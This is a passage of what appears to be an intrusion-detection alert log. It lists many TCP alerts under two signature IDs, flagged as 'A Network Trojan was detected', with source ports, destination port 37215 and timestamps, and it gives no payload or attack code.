          SID:2829579
          Source Port:41028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861931
          SID:2829579
          Source Port:52934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465949
          SID:2829579
          Source Port:55864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237424
          SID:2835222
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268673
          SID:2835222
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274547
          SID:2835222
          Source Port:42180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748119
          SID:2829579
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176496
          SID:2835222
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468802
          SID:2829579
          Source Port:44756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188151
          SID:2829579
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460848
          SID:2835222
          Source Port:44074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883886
          SID:2829579
          Source Port:43528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109313
          SID:2835222
          Source Port:59118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516545
          SID:2829579
          Source Port:51906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406407
          SID:2829579
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837120
          SID:2829579
          Source Port:46084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600689
          SID:2829579
          Source Port:52660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157957
          SID:2835222
          Source Port:42502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170646
          SID:2835222
          Source Port:33946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892312
          SID:2829579
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741692
          SID:2835222
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672595
          SID:2829579
          Source Port:34340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107108
          SID:2829579
          Source Port:41620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173097
          SID:2835222
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810690
          SID:2829579
          Source Port:53662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179005
          SID:2829579
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837343
          SID:2829579
          Source Port:60776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241331
          SID:2829579
          Source Port:47360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783269
          SID:2829579
          Source Port:39452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295344
          SID:2835222
          Source Port:59598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731524
          SID:2829579
          Source Port:35582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160769
          SID:2829579
          Source Port:54382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176087
          SID:2835222
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816507
          SID:2835222
          Source Port:34618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842407
          SID:2829579
          Source Port:46630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601757
          SID:2829579
          Source Port:58798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737008
          SID:2835222
          Source Port:51952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601138
          SID:2835222
          Source Port:40000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706907
          SID:2835222
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131924
          SID:2835222
          Source Port:34868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014735
          SID:2835222
          Source Port:56538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448942
          SID:2829579
          Source Port:32796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554842
          SID:2829579
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017920
          SID:2835222
          Source Port:40878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448764
          SID:2829579
          Source Port:59834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352714
          SID:2835222
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517617
          SID:2835222
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890632
          SID:2835222
          Source Port:49120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798746
          SID:2835222
          Source Port:43160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259917
          SID:2835222
          Source Port:57682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270823
          SID:2835222
          Source Port:47698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667670
          SID:2835222
          Source Port:58752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059890
          SID:2835222
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191408
          SID:2835222
          Source Port:45900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709655
          SID:2829579
          Source Port:44998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273350
          SID:2835222
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471891
          SID:2829579
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742611
          SID:2829579
          Source Port:45660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799927
          SID:2835222
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788392
          SID:2835222
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708983
          SID:2835222
          Source Port:35510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703563
          SID:2835222
          Source Port:45510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446542
          SID:2835222
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740936
          SID:2829579
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353198
          SID:2829579
          Source Port:38424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021974
          SID:2835222
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.458040
          SID:2829579
          Source Port:35038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547844
          SID:2829579
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892383
          SID:2835222
          Source Port:55052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732238
          SID:2835222
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806872
          SID:2829579
          Source Port:45654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810720
          SID:2835222
          Source Port:52156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113364
          SID:2829579
          Source Port:47330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157461
          SID:2829579
          Source Port:34866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673099
          SID:2829579
          Source Port:51818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862060
          SID:2835222
          Source Port:32832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793073
          SID:2829579
          Source Port:40704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513135
          SID:2829579
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020448
          SID:2829579
          Source Port:49766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109163
          SID:2829579
          Source Port:51804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446206
          SID:2835222
          Source Port:44522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179507
          SID:2835222
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014449
          SID:2829579
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396975
          SID:2829579
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264025
          SID:2835222
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465974
          SID:2835222
          Source Port:36652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741065
          SID:2835222
          Source Port:57994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402029
          SID:2829579
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173134
          SID:2835222
          Source Port:47774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793426
          SID:2829579
          Source Port:35280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512522
          SID:2829579
          Source Port:55098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175574
          SID:2829579
          Source Port:53778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178513
          SID:2829579
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188290
          SID:2835222
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263947
          SID:2835222
          Source Port:51646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551752
          SID:2835222
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516478
          SID:2829579
          Source Port:33100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795707
          SID:2829579
          Source Port:45516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862498
          SID:2829579
          Source Port:52266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781390
          SID:2829579
          Source Port:54734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043573
          SID:2835222
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463189
          SID:2835222
          Source Port:55300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154254
          SID:2829579
          Source Port:52074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896917
          SID:2829579
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302919
          SID:2829579
          Source Port:34938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729603
          SID:2835222
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017722
          SID:2835222
          Source Port:58566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703644
          SID:2835222
          Source Port:44482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038903
          SID:2829579
          Source Port:49188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807596
          SID:2829579
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542359
          SID:2829579
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884573
          SID:2835222
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.914391
          SID:2829579
          Source Port:50714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180692
          SID:2835222
          Source Port:49696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554580
          SID:2829579
          Source Port:45592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671135
          SID:2835222
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160067
          SID:2829579
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079587
          SID:2829579
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176693
          SID:2829579
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014957
          SID:2835222
          Source Port:56786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109178
          SID:2829579
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862490
          SID:2829579
          Source Port:42310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734330
          SID:2829579
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155128
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108924
          SID:2835222
          Source Port:50180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113706
          SID:2829579
          Source Port:35668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891310
          SID:2835222
          Source Port:49366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260632
          SID:2829579
          Source Port:36420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160247
          SID:2835222
          Source Port:49642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449096
          SID:2835222
          Source Port:40086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599233
          SID:2829579
          Source Port:56520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035531
          SID:2835222
          Source Port:58276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808765
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896791
          SID:2835222
          Source Port:50792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709941
          SID:2835222
          Source Port:58966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270073
          SID:2835222
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176115
          SID:2829579
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741647
          SID:2835222
          Source Port:43380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044153
          SID:2835222
          Source Port:42652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896003
          SID:2835222
          Source Port:57582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463159
          SID:2829579
          Source Port:53628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822906
          SID:2835222
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154851
          SID:2835222
          Source Port:46540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114519
          SID:2829579
          Source Port:41248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795229
          SID:2829579
          Source Port:44762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162549
          SID:2835222
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180503
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913668
          SID:2835222
          Source Port:47248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272003
          SID:2835222
          Source Port:44204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395360
          SID:2829579
          Source Port:44716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464919
          SID:2835222
          Source Port:60720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862447
          SID:2835222
          Source Port:53086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396357
          SID:2835222
          Source Port:55760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154038
          SID:2829579
          Source Port:41888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035079
          SID:2829579
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598817
          SID:2829579
          Source Port:39358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496084
          SID:2829579
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887621
          SID:2829579
          Source Port:56176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108143
          SID:2835222
          Source Port:33530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043442
          SID:2829579
          Source Port:56200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160910
          SID:2835222
          Source Port:50058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111807
          SID:2829579
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513901
          SID:2829579
          Source Port:44390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890837
          SID:2835222
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297267
          SID:2829579
          Source Port:49308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159629
          SID:2835222
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134152
          SID:2835222
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675214
          SID:2829579
          Source Port:35970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110684
          SID:2829579
          Source Port:51246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378505
          SID:2829579
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191794
          SID:2835222
          Source Port:54386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516638
          SID:2829579
          Source Port:33418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085446
          SID:2829579
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733621
          SID:2829579
          Source Port:35100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730804
          SID:2829579
          Source Port:46690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395074
          SID:2829579
          Source Port:39046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.457396
          SID:2835222
          Source Port:50874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668256
          SID:2829579
          Source Port:43264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817251
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241390
          SID:2829579
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730949
          SID:2829579
          Source Port:51912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810602
          SID:2835222
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671855
          SID:2829579
          Source Port:60954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708381
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554340
          SID:2835222
          Source Port:50652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128028
          SID:2829579
          Source Port:37414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467036
          SID:2835222
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270736
          SID:2829579
          Source Port:53782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075165
          SID:2829579
          Source Port:42422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731620
          SID:2835222
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354424
          SID:2829579
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749069
          SID:2835222
          Source Port:58602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268654
          SID:2829579
          Source Port:39390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188186
          SID:2835222
          Source Port:40694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783347
          SID:2835222
          Source Port:33248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672684
          SID:2829579
          Source Port:49272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894802
          SID:2835222
          Source Port:35210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159038
          SID:2835222
          Source Port:53536
          Destination Port:37215
